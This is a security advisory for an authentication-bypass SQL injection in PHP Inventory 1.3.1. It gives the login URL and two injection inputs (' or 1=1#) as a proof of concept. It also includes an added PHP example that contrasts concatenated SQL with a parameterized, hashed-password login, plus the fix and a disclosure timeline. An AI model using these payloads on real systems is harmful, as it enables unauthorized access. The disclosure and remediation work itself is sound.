PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability



Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
Advisory ID: INFOSERVE-ADV2011-08
Author: Stefan Schurtz
Contact: security@xxxxxxxxxxxx
Affected Software: Successfully tested on PHP Inventory 1.3.1
Vendor URL: http://www.phpwares.com/
Vendor Status: fixed
CVE-ID: CVE-2009-4595,CVE-2009-4596,CVE-2009-4597

==========================
Vulnerability Description
==========================

PHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability.

==================
PoC-Exploit
==================

http://[target]/php-inventory/index.php

// with 'magic_quotes_gpc = Off'

USER NAME = ' or 1=1#

or

USER NAME = admin
PASSWORD = ' or 1=1#
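
Added example (not part of the original advisory and not PHP Inventory's code): how the two input pairs above land in a login query built by string concatenation, next to a login that binds the user name as a parameter and checks the password in PHP. The table and column names, function names, query shape and sample password are assumptions, and an in-memory SQLite database stands in for the application's database.

```php
<?php
declare(strict_types=1);

// Hypothetical users table; constructed sample account and password.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_name TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (user_name, pass_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// Assumed shape of a concatenated login query. The string is only returned
// for display, never executed, to show where the quote ends the literal.
function concatenated_login_sql(string $user, string $pass): string
{
    return "SELECT * FROM users WHERE user_name = '$user' AND password = '$pass'";
}

// Hardened login: the user name is a bound parameter, so a quote inside it
// is data, and the password is verified in PHP against the stored hash
// instead of being compared inside the SQL statement.
function login(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM users WHERE user_name = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();   // false when no row matches
    return is_string($hash) && password_verify($pass, $hash);
}

$inputs = [
    ["' or 1=1#", ''],                         // first input pair from the advisory
    ['admin', "' or 1=1#"],                    // second input pair from the advisory
    ['admin', 'constructed-sample-password'],  // legitimate login
];

foreach ($inputs as [$user, $pass]) {
    echo 'concatenated: ', concatenated_login_sql($user, $pass), "\n";
    echo 'bound login:  ', login($db, $user, $pass) ? 'accepted' : 'rejected', "\n\n";
}
```

The bound login rejects both advisory inputs regardless of the magic_quotes_gpc setting, because the decision no longer depends on how the input is quoted.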

=========
Solution
=========

Update to the latest version 1.3.2

====================
Disclosure Timeline
====================

29-Nov-2011 - informed vendor (contact form)
30-Nov-2011 - vendor fix

========
Credits
========

Vulnerability found and advisory written by the INFOSERVE security team.

===========
References
===========

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-08.txt
http://www.exploit-db.com/exploits/10370/
http://secunia.com/advisories/37672/


